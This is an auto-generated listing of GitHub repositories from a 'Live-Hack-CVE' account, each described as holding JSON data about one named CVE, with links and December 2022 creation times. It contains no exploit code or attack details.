**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21650 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21650](https://github.com/Live-Hack-CVE/CVE-2020-21650) create time: 2022-12-25T23:13:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-20124 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-20124](https://github.com/Live-Hack-CVE/CVE-2020-20124) create time: 2022-12-25T23:13:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-20665 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-20665](https://github.com/Live-Hack-CVE/CVE-2020-20665) create time: 2022-12-25T23:13:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25594 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25594](https://github.com/Live-Hack-CVE/CVE-2020-25594) create time: 2022-12-25T23:13:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-12527 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-12527](https://github.com/Live-Hack-CVE/CVE-2020-12527) create time: 2022-12-25T22:30:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23337 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23337](https://github.com/Live-Hack-CVE/CVE-2021-23337) create time: 2022-12-25T23:18:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-34574 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-34574](https://github.com/Live-Hack-CVE/CVE-2021-34574) create time: 2022-12-25T23:16:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23017 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23017](https://github.com/Live-Hack-CVE/CVE-2021-23017) create time: 2022-12-25T23:16:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40648 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40648](https://github.com/Live-Hack-CVE/CVE-2021-40648) create time: 2022-12-25T23:14:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40647 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40647](https://github.com/Live-Hack-CVE/CVE-2021-40647) create time: 2022-12-25T23:14:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3024 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3024](https://github.com/Live-Hack-CVE/CVE-2021-3024) create time: 2022-12-25T23:13:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36213 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36213](https://github.com/Live-Hack-CVE/CVE-2021-36213) create time: 2022-12-25T23:12:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38698 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38698](https://github.com/Live-Hack-CVE/CVE-2021-38698) create time: 2022-12-25T23:12:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3114 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3114](https://github.com/Live-Hack-CVE/CVE-2021-3114) create time: 2022-12-25T23:12:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3115 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3115](https://github.com/Live-Hack-CVE/CVE-2021-3115) create time: 2022-12-25T23:12:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33198 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33198](https://github.com/Live-Hack-CVE/CVE-2021-33198) create time: 2022-12-25T23:12:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33197 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33197](https://github.com/Live-Hack-CVE/CVE-2021-33197) create time: 2022-12-25T23:12:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33195 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33195](https://github.com/Live-Hack-CVE/CVE-2021-33195) create time: 2022-12-25T23:12:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-29923 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-29923](https://github.com/Live-Hack-CVE/CVE-2021-29923) create time: 2022-12-25T23:12:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36221 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36221](https://github.com/Live-Hack-CVE/CVE-2021-36221) create time: 2022-12-25T23:12:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-37819 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-37819](https://github.com/Live-Hack-CVE/CVE-2021-37819) create time: 2022-12-25T23:11:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44835 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44835](https://github.com/Live-Hack-CVE/CVE-2021-44835) create time: 2022-12-25T22:37:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44425 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44425](https://github.com/Live-Hack-CVE/CVE-2021-44425) create time: 2022-12-25T22:30:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44426 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44426](https://github.com/Live-Hack-CVE/CVE-2021-44426) create time: 2022-12-25T22:30:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30874 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30874](https://github.com/Live-Hack-CVE/CVE-2022-30874) create time: 2022-12-25T23:18:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30308 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30308](https://github.com/Live-Hack-CVE/CVE-2022-30308) create time: 2022-12-25T23:18:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30311 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30311](https://github.com/Live-Hack-CVE/CVE-2022-30311) create time: 2022-12-25T23:18:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30310 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30310](https://github.com/Live-Hack-CVE/CVE-2022-30310) create time: 2022-12-25T23:18:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30309 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30309](https://github.com/Live-Hack-CVE/CVE-2022-30309) create time: 2022-12-25T23:18:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20863 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20863](https://github.com/Live-Hack-CVE/CVE-2022-20863) create time: 2022-12-25T23:17:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20696 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20696](https://github.com/Live-Hack-CVE/CVE-2022-20696) create time: 2022-12-25T23:17:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-31166 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-31166](https://github.com/Live-Hack-CVE/CVE-2022-31166) create time: 2022-12-25T23:17:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-31149 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-31149](https://github.com/Live-Hack-CVE/CVE-2022-31149) create time: 2022-12-25T23:17:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-31251 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-31251](https://github.com/Live-Hack-CVE/CVE-2022-31251) create time: 2022-12-25T23:17:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21950 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21950](https://github.com/Live-Hack-CVE/CVE-2022-21950) create time: 2022-12-25T23:17:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26860 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26860](https://github.com/Live-Hack-CVE/CVE-2022-26860) create time: 2022-12-25T23:17:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26859 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26859](https://github.com/Live-Hack-CVE/CVE-2022-26859) create time: 2022-12-25T23:17:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26858 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26858](https://github.com/Live-Hack-CVE/CVE-2022-26858) create time: 2022-12-25T23:17:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2945 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2945](https://github.com/Live-Hack-CVE/CVE-2022-2945) create time: 2022-12-25T23:17:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29850 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29850](https://github.com/Live-Hack-CVE/CVE-2022-29850) create time: 2022-12-25T23:17:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26861 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26861](https://github.com/Live-Hack-CVE/CVE-2022-26861) create time: 2022-12-25T23:17:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38400 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38400](https://github.com/Live-Hack-CVE/CVE-2022-38400) create time: 2022-12-25T23:16:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37857 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37857](https://github.com/Live-Hack-CVE/CVE-2022-37857) create time: 2022-12-25T23:16:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37164 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37164](https://github.com/Live-Hack-CVE/CVE-2022-37164) create time: 2022-12-25T23:16:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36376 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36376](https://github.com/Live-Hack-CVE/CVE-2022-36376) create time: 2022-12-25T23:16:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36092 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36092](https://github.com/Live-Hack-CVE/CVE-2022-36092) create time: 2022-12-25T23:16:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36093 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36093](https://github.com/Live-Hack-CVE/CVE-2022-36093) create time: 2022-12-25T23:16:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38256 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38256](https://github.com/Live-Hack-CVE/CVE-2022-38256) create time: 2022-12-25T23:16:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3167 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3167](https://github.com/Live-Hack-CVE/CVE-2022-3167) create time: 2022-12-25T23:16:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-31167 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-31167](https://github.com/Live-Hack-CVE/CVE-2022-31167) create time: 2022-12-25T23:16:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36099 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36099](https://github.com/Live-Hack-CVE/CVE-2022-36099) create time: 2022-12-25T23:15:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36100 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36100](https://github.com/Live-Hack-CVE/CVE-2022-36100) create time: 2022-12-25T23:15:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39809 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39809](https://github.com/Live-Hack-CVE/CVE-2022-39809) create time: 2022-12-25T23:15:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39810 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39810](https://github.com/Live-Hack-CVE/CVE-2022-39810) create time: 2022-12-25T23:15:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2010-1280 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2010-1280](https://github.com/Live-Hack-CVE/CVE-2010-1280) create time: 2022-12-25T21:57:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-5096 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-5096](https://github.com/Live-Hack-CVE/CVE-2012-5096) create time: 2022-12-25T21:55:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-1548 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-1548](https://github.com/Live-Hack-CVE/CVE-2013-1548) create time: 2022-12-25T21:55:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-1511 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-1511](https://github.com/Live-Hack-CVE/CVE-2013-1511) create time: 2022-12-25T21:55:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-3812 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-3812](https://github.com/Live-Hack-CVE/CVE-2013-3812) create time: 2022-12-25T21:54:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-3470 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-3470](https://github.com/Live-Hack-CVE/CVE-2014-3470) create time: 2022-12-25T21:55:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-6474 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-6474](https://github.com/Live-Hack-CVE/CVE-2014-6474) create time: 2022-12-25T21:55:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-6568 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-6568](https://github.com/Live-Hack-CVE/CVE-2014-6568) create time: 2022-12-25T21:54:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-0437 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-0437](https://github.com/Live-Hack-CVE/CVE-2014-0437) create time: 2022-12-25T21:54:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-2438 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-2438](https://github.com/Live-Hack-CVE/CVE-2014-2438) create time: 2022-12-25T21:54:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-2430 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-2430](https://github.com/Live-Hack-CVE/CVE-2014-2430) create time: 2022-12-25T21:54:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-0505 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-0505](https://github.com/Live-Hack-CVE/CVE-2015-0505) create time: 2022-12-25T21:55:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-8393 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-8393](https://github.com/Live-Hack-CVE/CVE-2015-8393) create time: 2022-12-25T21:54:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-19586 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-19586](https://github.com/Live-Hack-CVE/CVE-2020-19586) create time: 2022-12-25T21:52:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-19587 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-19587](https://github.com/Live-Hack-CVE/CVE-2020-19587) create time: 2022-12-25T21:51:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-0697 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-0697](https://github.com/Live-Hack-CVE/CVE-2021-0697) create time: 2022-12-25T21:57:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-0871 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-0871](https://github.com/Live-Hack-CVE/CVE-2021-0871) create time: 2022-12-25T21:57:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-0942 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-0942](https://github.com/Live-Hack-CVE/CVE-2021-0942) create time: 2022-12-25T21:56:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-0943 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-0943](https://github.com/Live-Hack-CVE/CVE-2021-0943) create time: 2022-12-25T21:56:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33643 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33643](https://github.com/Live-Hack-CVE/CVE-2021-33643) create time: 2022-12-25T21:54:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33645 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33645](https://github.com/Live-Hack-CVE/CVE-2021-33645) create time: 2022-12-25T21:54:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33646 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33646](https://github.com/Live-Hack-CVE/CVE-2021-33646) create time: 2022-12-25T21:54:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33644 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33644](https://github.com/Live-Hack-CVE/CVE-2021-33644) create time: 2022-12-25T21:54:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38924 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38924](https://github.com/Live-Hack-CVE/CVE-2021-38924) create time: 2022-12-25T21:51:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-42948 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-42948](https://github.com/Live-Hack-CVE/CVE-2021-42948) create time: 2022-12-25T21:51:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-42949 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-42949](https://github.com/Live-Hack-CVE/CVE-2021-42949) create time: 2022-12-25T21:50:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44076 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44076](https://github.com/Live-Hack-CVE/CVE-2021-44076) create time: 2022-12-25T21:18:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36201 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36201](https://github.com/Live-Hack-CVE/CVE-2022-36201) create time: 2022-12-25T21:59:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36089 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36089](https://github.com/Live-Hack-CVE/CVE-2022-36089) create time: 2022-12-25T21:59:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35833 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35833](https://github.com/Live-Hack-CVE/CVE-2022-35833) create time: 2022-12-25T21:59:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1697 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1697](https://github.com/Live-Hack-CVE/CVE-2022-1697) create time: 2022-12-25T21:59:50Z

